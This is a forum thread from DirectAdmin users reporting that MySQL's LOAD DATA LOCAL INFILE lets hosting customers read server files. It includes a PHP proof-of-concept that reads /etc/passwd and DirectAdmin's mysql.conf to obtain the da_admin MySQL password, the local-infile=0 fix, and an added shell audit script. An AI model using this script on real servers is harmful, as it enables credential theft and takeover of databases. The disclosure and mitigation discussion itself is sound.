Big issue with the default MySQL setup of DirectAdmin

duke28

hi,

do what you want with this post on this forum

but the default mysql of directadmin

has a big issue..

with mysql and a database with a table, we can find the root sql password ( da_admin )

we can read this : /usr/local/directadmin/conf/mysql.conf

with this command in mysql :
with a php file with code like this =

<?php

//file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "xxxxxx", "xxxxxxxxx");
mysql_select_db('syscall_qtm',$l);
//mysql_query("DELETE FROM a");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE xxxx_xxxx.a");

$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);

?>

change just xxxx with all you need, and you can read any file you want on the server..

to protect against this issue you need to do this :


cd /etc/rc.d/init.d

pico mysqld

and add this to the START LINE :
--local-infile=0


and restart mysqld..

THIS IS A BIG ISSUE..
ANYBODY CAN FIND YOUR DA_ADMIN PASSWORD FOR MYSQL AND DELETE ALL DATABASE ON YOUR SERVER..

the command LOAD DATA LOCAL INFILE needs to be disabled in mysql.. because it makes no sense..

the example is for /etc/passwd , but all users with this command + mysql can read /usr/local/directadmin/conf/mysql.conf with my example...

( sorry for my english )
 
Is this true?

Will a security update be released for this if it's a bug..... o_O
 
And some of you are probably using your mysql password as your admin login to DA and or root. :(
 
Seems like a complete non-issue to me.

Yes, everyone can read /etc/passwd. So what?!? That's what shadow passwords were invented for!!

Furthermore, everyone should not be able to read /usr/local/directadmin/conf/*, because the directory is only readable by the 'diradmin' user and group, and mysql is running in its own user-space. If you've changed the permissions for the 'conf' directory, or have mySQL running as 'root', then I'm sure it's of your own doing, and not DA.

Also, the password DirectAdmin automatically assigns to mySQL upon install is randomly generated, so should not be the same as the root/DA admin user on the server.

-Swift
 
It's a known issue, and it was already reported to John a few weeks ago (still no answer). You don't need to edit the mysqld service start/stop script. Just add this to /etc/my.cnf:
Code:
local-infile=0
ELS adds it by default.
 
You sure this will solve the problem?
 
Yes, I am :) And it's not a bug, it's just a functionality of MySQL that needs to be disabled for shared hosting :) (something similar to disable_functions in PHP) :)
 
yea i know it's not a bug but one big security issue..

and yes, if the command is not disabled in mysql, all users can find how to read /usr/local/directadmin/conf/* with mysql !!
 
i dont get it.

so what is the conclusion?

is this a non-issue? meaning, i don't have to do anything or worry about it?

or do i have to change something on my server.
 
hi
you need to add this :

local-infile=0

in /etc/my.cnf

and restart mysqld

because if you don't disable this command someone can read this file : /usr/local/directadmin/conf/mysql.conf and get your da_admin password for phpmyadmin..
 
Users can only read the conf/* files if you have mysql running as 'root' or 'diradmin', which it should not be. My system is running mysql as 'mysql', and I have verified that nothing in the /usr/local/directadmin/conf/ directory is accessible by users in the way you mention. There is no need to cripple mySQL functionality to have a secure system!

-Swift

 
it's because you haven't tested :)

mysql runs as the mysql user..

and with the command LOAD DATA LOCAL INFILE we can load the mysql.conf and see the password..
trust me..
 
I'm still confused, i do not know who to believe.

Doesn't mysql run as user mysql in a default da install ?

So we don't need to worry about it like Swift said?
 
Nope, sorry. Doesn't work for me. I can load /etc/passwd etc, but nothing in DA's conf/ directory. Are the permissions for your DA conf/ directory set securely (read/write access only to 'diradmin' user)? i.e.

Code:
# pwd
/usr/local/directadmin
# ls -l | grep conf
drwx------  2 diradmin  diradmin      512 Jul 10 11:44 conf

-Swift
 
yea if you test with just php.. it's normal..

but if you do your test with the command in mysql :
mysql_query("LOAD DATA LOCAL INFILE '/usr/local/directadmin/conf/mysql.conf' INTO TABLE xxxx_xxxx.a")

it's going to work :)

anyway maybe it's my bad english.. but i know it's working..
if local-infile is active in mysql, i can read /usr/local/directadmin/conf/mysql.conf with mysql4

i have tested on many servers !

script to read this file:

<?php

//file_get_contents('/etc/passwd');

$l = mysql_connect("localhost", "xxxxxx", "xxxxxxxxx");
mysql_select_db('xxxxx_xxx',$l);
//mysql_query("DELETE FROM a");
mysql_query("LOAD DATA LOCAL INFILE '/usr/local/directadmin/conf/mysql.conf' INTO TABLE xxxx_xxxx.a");

$result = mysql_query("SELECT a FROM a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);

?>

change xxxx with your database infos
 
i tried your following example and it didn't return anything to me.
btw i have created the tables and field name like you specified.
i am on mysql 4.1.21
 
oh wait, he is right!!
i WAS ABLE TO GET THE ROOT MYSQL password.

i just created a table name with 1 field, called 'a', and it worked. before i had an ID in there so it was giving me blank!

i just tested this on BOTH mysql 4.1.21 and mysql 5.0.45!!!

this is an extremely urgent problem and i wish DA would fix this immediately in their custombuild script!

wow, thank you for catching this one.

this is incredibly bad!
 
so i'm not stupid ??


hihi

cd /etc/rc.d/init.d

pico mysqld

and add this to the START LINE :
--local-infile=0

( change $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file >/dev/null 2>&1 &

for this one : $bindir/mysqld_safe --datadir=$datadir --pid-file=$pid_file --local-infile=0 >/dev/null 2>&1 & )


and restart mysqld..

it's what i did..

but someone said putting local-infile=0 in /etc/my.cnf is ok to disable it..

and when you repeat your test after it .. you need to empty the table..
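
Added example, not part of any post in this thread: a shell check for the two settings the posters argue about, namely whether local-infile is disabled in the [mysqld] group of an option file and whether a directory such as DirectAdmin's conf/ is mode drwx------. The function names and sample files are constructed for illustration, and only the [mysqld] group is inspected (an assumption; other server groups are not checked).

```shell
#!/bin/sh
# Added example: audit the two settings discussed in this thread.

# Print the local-infile state of the [mysqld] group in an option file:
# "disabled", "enabled" or "unset" (the last occurrence wins).
# Assumption: only the [mysqld] group is inspected.
local_infile_state() {
    awk '
        BEGIN { state = "unset" }
        { sub(/^[ \t]+/, ""); sub(/[ \t\r]+$/, "") }
        /^[#;]/ || /^$/ { next }
        /^\[/ { in_mysqld = (tolower($0) == "[mysqld]"); next }
        in_mysqld {
            n = index($0, "=")
            key = (n ? substr($0, 1, n - 1) : $0)
            val = (n ? substr($0, n + 1) : "1")   # bare option means "on"
            sub(/[ \t]*#.*/, "", val)             # drop trailing comment
            gsub(/[ \t]/, "", key); gsub(/[ \t]/, "", val)
            key = tolower(key); gsub(/_/, "-", key)  # local_infile == local-infile
            val = tolower(val)
            if (key == "local-infile")
                state = (val == "0" || val == "off" || val == "false") ? "disabled" : "enabled"
        }
        END { print state }
    ' "$1"
}

# Succeed only if the directory grants nothing to group or other (drwx------).
dir_is_private() {
    [ "$(ls -ld "$1" | cut -c1-10)" = "drwx------" ]
}

# Constructed sample input. In wrong.cnf the line sits under [client],
# so the server never sees it; right.cnf has it under [mysqld].
tmp=$(mktemp -d)
printf '[client]\nlocal-infile=0\n[mysqld]\nuser=mysql\n' > "$tmp/wrong.cnf"
printf '[mysqld]\nuser=mysql\nlocal_infile = OFF  # shared hosting\n' > "$tmp/right.cnf"
mkdir "$tmp/conf" && chmod 700 "$tmp/conf"

echo "wrong.cnf: $(local_infile_state "$tmp/wrong.cnf")"
echo "right.cnf: $(local_infile_state "$tmp/right.cnf")"
dir_is_private "$tmp/conf" && echo "conf: private"
rm -rf "$tmp"
```

On a real server, point the functions at /etc/my.cnf and /usr/local/directadmin/conf; after restarting mysqld, the running value can also be confirmed with SHOW VARIABLES LIKE 'local_infile'.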
 